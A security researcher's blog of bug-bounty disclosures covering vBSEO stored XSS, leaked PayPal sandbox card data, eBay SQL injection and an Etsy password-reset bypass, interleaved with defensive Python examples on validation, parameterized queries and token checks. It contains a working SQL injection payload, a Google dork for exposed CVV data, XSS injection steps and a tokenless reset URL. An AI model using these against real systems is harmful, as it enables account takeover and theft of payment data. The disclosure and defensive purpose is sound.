Tuesday, December 24, 2013

Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO

Posted by Yogesh Jaygadkar, 11:07 AM

Exploit Title: Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO.
Found By: Yogesh Jaygadkar | http://www.jaygadkar.com/
Tested versions: vBSEO 3.2.0 & vBSEO 3.6.0
Tested with: vBulletin 4.0.6 & vBulletin 4.2.1
Vulnerable POST Parameter: sendtrackbacks

The vBSEO plugin for vBulletin contains a flaw that allows a stored cross-site scripting (XSS) attack. The flaw exists because the application does not validate the 'sendtrackbacks' parameter when it is submitted to the /forum/newreply.php and /forum/newthread.php scripts. This may allow an attacker to create a specially crafted request that executes arbitrary script code in a user's browser within the trust relationship between their browser and the server.


http://www.VictimVBForum.com/forum/newreply.php?do=postreply&t=[Thread ID]

On the Advanced Reply or New Thread page, put your ">vector in the "Trackback" field.

Submit the reply (you can also test it by clicking the Preview Post button).

Done  ;)
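The defensive counterpart to the flaw described above, as an added example that is not vBSEO's or vBulletin's code: a server-side validator for the trackback field (each entry must be an absolute http(s) URL containing no quote, angle-bracket or whitespace characters), shown beside the vulnerable and the output-encoded way of echoing the stored value back into a form. The function names, the sample inputs and the `<input>` markup are assumptions made for the demonstration; the post says nothing about how vBSEO renders the field.

```python
import html
from urllib.parse import urlsplit

# Constructed inputs: a legitimate two-line trackback field and one that carries the
# attribute-breaking "> sequence from the advisory (hypothetical values, not real sites).
GOOD_TRACKBACKS = "http://blog.example/post/1\nhttps://other.example/entry?id=7"
BAD_TRACKBACK = 'http://blog.example/">injected'


def parse_trackbacks(raw):
    """Split the submitted sendtrackbacks value into candidate URLs (whitespace separated)."""
    return raw.split()


def is_valid_trackback(url):
    """Server-side allow-list: an absolute http(s) URL with a host and none of the
    characters that could close an attribute or tag if the value is echoed back."""
    if any(ch in '<>"\'\\' or ch.isspace() for ch in url):
        return False
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def validate_trackbacks(raw):
    """Return (accepted, rejected) lists for one submitted field value."""
    accepted, rejected = [], []
    for url in parse_trackbacks(raw):
        (accepted if is_valid_trackback(url) else rejected).append(url)
    return accepted, rejected


def render_unsafe(url):
    """How stored XSS arises: the stored value is dropped straight into markup."""
    return '<input name="trackback" value="%s">' % url


def render_safe(url):
    """Output encoding: html.escape(quote=True) turns & < > " ' into entities, so the
    value can no longer terminate the attribute even if validation was bypassed."""
    return '<input name="trackback" value="%s">' % html.escape(url, quote=True)


if __name__ == "__main__":
    ok, bad = validate_trackbacks(GOOD_TRACKBACKS + "\n" + BAD_TRACKBACK)
    print("accepted:", ok)
    print("rejected:", bad)
    print(render_unsafe(BAD_TRACKBACK))
    print(render_safe(BAD_TRACKBACK))
```

Both layers matter: validation on submission stops the bad value from being stored at all, and output encoding on every page that displays the field (the preview as well as the posted reply) protects values that were stored before the fix.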


PayPal : User Credit Card Information Disclosure

Posted by Yogesh, 10:21 AM

Okay... So, here is another old & duplicate bug from PayPal, which I reported looooong back.

I have found some strange results on api-3t.sandbox.paypal.com. This sub domain is storing all credit card information of PayPal users in the URL. Below is the Google dork for finding such “stored” CC details.

Google Dork: site:sandbox.paypal.com inurl:CVV2=

Google results are not many, nearly 80, but still harmful, as sensitive user information is getting leaked.
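As an added example that is not taken from the post or from PayPal: a log check in the spirit of the finding above, run over constructed access-log lines. It flags query parameters that carry card data, either by a known parameter name such as CVV2 or because the value passes the Luhn check, and shows the redacted request target that should be written to logs instead. The log format, the parameter names other than CVV2, the paths and the test card number 4111111111111111 are all assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not real PayPal traffic). The card number is the
# well-known test PAN 4111111111111111 and the expiry/CVV values are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Dec/2013:10:21:00 +0000] "GET /nvp?METHOD=DoDirectPayment&ACCT=4111111111111111&EXPDATE=122015&CVV2=123 HTTP/1.1" 200 512
10.0.0.6 - - [24/Dec/2013:10:21:07 +0000] "GET /nvp?METHOD=GetBalance&USER=demo HTTP/1.1" 200 310
10.0.0.7 - - [24/Dec/2013:10:21:09 +0000] "GET /search?q=4111-1111-1111-1111 HTTP/1.1" 200 100
"""

# Parameter names that should never appear in a URL (assumed list; CVV2 is from the post).
SENSITIVE_PARAMS = {"acct", "cvv2", "cvv", "expdate", "cardnum"}
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def luhn_ok(digits):
    """Luhn checksum, used to tell a real-looking PAN from an arbitrary digit run."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def looks_like_pan(value):
    """13-19 digits (spaces/dashes allowed) that satisfy Luhn."""
    digits = re.sub(r"[ -]", "", value)
    return digits.isdigit() and 13 <= len(digits) <= 19 and luhn_ok(digits)


def scan_query(target):
    """Return the names of query parameters carrying card data, in request order."""
    flagged = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() in SENSITIVE_PARAMS or looks_like_pan(value):
            flagged.append(name)
    return flagged


def redact_target(target):
    """Rewrite the request target so flagged values never reach logs or Referer headers."""
    parts = urlsplit(target)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    flagged = set(scan_query(target))
    query = "&".join("%s=%s" % (n, "[REDACTED]" if n in flagged else v) for n, v in pairs)
    return parts._replace(query=query).geturl()


def scan_log(text):
    """Return (line_number, flagged_params, redacted_target) for each offending line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        flagged = scan_query(m.group("target"))
        if flagged:
            hits.append((lineno, flagged, redact_target(m.group("target"))))
    return hits


if __name__ == "__main__":
    for lineno, flagged, redacted in scan_log(SAMPLE_LOG):
        print("line %d: card data in %s -> %s" % (lineno, flagged, redacted))
```

The Luhn check catches card numbers that arrive under an innocent-looking name (the `q` parameter in the third line), which a name-only filter would miss; the real fix is to move card data out of GET parameters entirely, since anything in a URL ends up in server logs, browser history, Referer headers and, as the post shows, search engine indexes.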


Friday, February 22, 2013

Listed in Barracuda Networks Hall of Fame

Posted by Yogesh, 11:28 PM

Listed in Barracuda Networks Security - Hall of Fame.

Found multiple vulnerabilities in Barracuda security products. Bugs are still not patched. I'll update the POC once all bugs get patched.

Thanks :)


Wednesday, February 20, 2013

Listed in Google Hall Of Fame

Posted by Yogesh, 11:35 PM

After 2 continuous duplicate bugs & 2 rejections, Google accepted my 3 bugs... 1 bug is fixed, 2 more in a row :D. The 1st bug did not qualify for a reward, so they listed me on their Google Hall of Fame - distinction. But soon I'll be on the Reward Recipients page ;)

So, finally I am listed in the Google Hall Of Fame. I'll update the POC once all bugs get patched.


Friday, January 25, 2013

SQL Injection Vulnerability in ebay sub domains

Posted by Yogesh, 10:13 AM

Title: SQL Injection Vulnerability in www.ebay.com sub domains
Author: Yogesh D Jaygadkar
Reported: December 27, 2012
Fixed: Jan 15, 2013
Public Released: Jan 25, 2013
Thanks To: Darshit Ashara

Greets: Rahul Bro, Aasim, Sandeep, Sagar


Last month I reported SQL Injection vulnerabilities in www.ebay.com sub domains. You can see how many days they took for patching & allowing me to publish the vulnerability. But finally they fixed it & listed me on their Researchers Acknowledgement Page. Like every other bounty hunter I was also searching for some vulnerability in eBay. At that time I had no idea that eBay doesn't give a bounty for any vulnerability. Not even for SQL Injection. :)


Vulnerable Parameter: "checkbox[]" array POST parameter.

The search option on the above pages provides “Select Site” checkboxes, which filter the search results by country.

HTTP Headers:

Host: sea.ebay.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: Cookie Value
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

POST Contents: checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&

So this is all for submitting the report. After that I simply used sqlmap, the great :)
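An added example (not eBay's code) of the bug class above, generalised beyond the single request shown: a site-filter search that pastes each element of a checkbox[]-style array into an SQL IN (...) list, beside the parameterized version that gives every array element its own placeholder so the database never parses user input as SQL. The SQLite schema, the rows, the function names and the hostile array value are assumptions made for the demonstration.

```python
import sqlite3

# Constructed schema and rows; a real listing index would be far larger.
ROWS = [("US", "Widget"), ("UK", "Gadget"), ("DE", "Gizmo")]

# Constructed hostile checkbox[] value: a single array element containing a quote
# and a parenthesis, enough to change the structure of a concatenated query.
HOSTILE_CHECKBOX = ["US') OR ('1'='1"]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE listings (site TEXT, title TEXT)")
    conn.executemany("INSERT INTO listings VALUES (?, ?)", ROWS)
    return conn


def unsafe_sql(sites):
    """The vulnerable pattern: every element of the array is quoted by string
    formatting and pasted into the IN (...) list, so a quote in any element
    escapes the literal and the rest of the element becomes SQL."""
    quoted = ", ".join("'%s'" % s for s in sites)
    return "SELECT title FROM listings WHERE site IN (%s)" % quoted


def search_unsafe(conn, sites):
    return [row[0] for row in conn.execute(unsafe_sql(sites))]


def search_safe(conn, sites):
    """The fix: build only the placeholder list from the array length and hand the
    values to the driver separately; each element is bound as data, never as SQL."""
    if not sites:
        return []
    placeholders = ", ".join("?" * len(sites))
    sql = "SELECT title FROM listings WHERE site IN (%s)" % placeholders
    return [row[0] for row in conn.execute(sql, list(sites))]


if __name__ == "__main__":
    db = make_db()
    print("normal, safe:   ", search_safe(db, ["US", "UK"]))
    print("hostile, unsafe:", search_unsafe(db, HOSTILE_CHECKBOX))
    print("hostile, safe:  ", search_safe(db, HOSTILE_CHECKBOX))
```

Array parameters are a common blind spot for this bug: the scalar fields of the form may already be parameterized while the variable-length list is still assembled by string concatenation, so a code review of the fix should look specifically at every IN (...) clause built from request data.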


Tuesday, January 8, 2013

Password Reset Vulnerability in etsy.com

Posted by Yogesh, 3:36 AM

Title: Password Reset Vulnerability in etsy.com
Vuln URL
Author: Yogesh D Jaygadkar
Reported: December 30, 2012
Fixed: December 30, 2012
Public Released: Jan 08, 2013

In etsy.com, when users reset their password, they receive a password reset link like the one below.

https://www.etsy.com/confirm.php?email=[User Email ID]&code=[Token code]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1

When I received this mail, I started playing with this link. I noticed that the token is not getting validated on the server side. So I removed it & tested with my own ID.

Final POC:
https://www.etsy.com/confirm.php?email=[victim user's email ID]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1
And the password changed successfully.
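An added example, not Etsy's implementation, of what server-side validation of the code= token in a reset link should look like: the token is issued with an expiry, stored only as a hash, required to be present, compared in constant time, and consumed on first use, so a request that simply drops the code parameter (as in the POC above) is refused. The in-memory stores, the function and field names and the 15-minute lifetime are assumptions.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60   # assumed lifetime of a reset link

# Constructed in-memory stores; a real deployment keeps both in the database.
USERS = {"alice@example.com": {"password": "old-secret"},
         "bob@example.com": {"password": "bob-secret"}}
PENDING_RESETS = {}   # email -> (sha256 hex digest of token, expiry timestamp)


def _digest(token):
    # Store only a hash so a leaked table of pending resets cannot be replayed.
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset(email, now=None):
    """Create a single-use token for the account and return it (this is the value
    that would be placed in the e-mailed link's code= parameter)."""
    now = time.time() if now is None else now
    if email not in USERS:
        return None   # the caller still reports success, to avoid account enumeration
    token = secrets.token_urlsafe(32)
    PENDING_RESETS[email] = (_digest(token), now + TOKEN_TTL_SECONDS)
    return token


def reset_password(email, code, new_password, now=None):
    """Change the password only when the account has a live reset, a code was sent,
    it matches in constant time and has not expired; the code is consumed on success."""
    now = time.time() if now is None else now
    if not code or email not in PENDING_RESETS:
        return False
    expected_digest, expires_at = PENDING_RESETS[email]
    if now > expires_at:
        del PENDING_RESETS[email]
        return False
    if not hmac.compare_digest(expected_digest, _digest(code)):
        return False
    del PENDING_RESETS[email]   # single use: a second visit to the same link fails
    USERS[email]["password"] = new_password
    return True


if __name__ == "__main__":
    token = issue_reset("alice@example.com")
    print("missing code accepted?", reset_password("alice@example.com", "", "x"))
    print("valid code accepted?  ", reset_password("alice@example.com", token, "new-secret"))
    print("replay accepted?      ", reset_password("alice@example.com", token, "again"))
```

The `now` argument exists only so the expiry path can be exercised deterministically; in production it is left at the default. The essential property is that the e-mail address alone never authorises a change: the decision rests on the secret the server generated and can look up, and on nothing the client chooses.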

Finally I am listed on the ETSY Thanks Page & rewarded with a $1500 bounty & T-shirt.
Thanks to the etsy security team for the quick reply.

Thanks to my friends: Darshit, Sandeep, Rahul bro, Aasim, Sagar

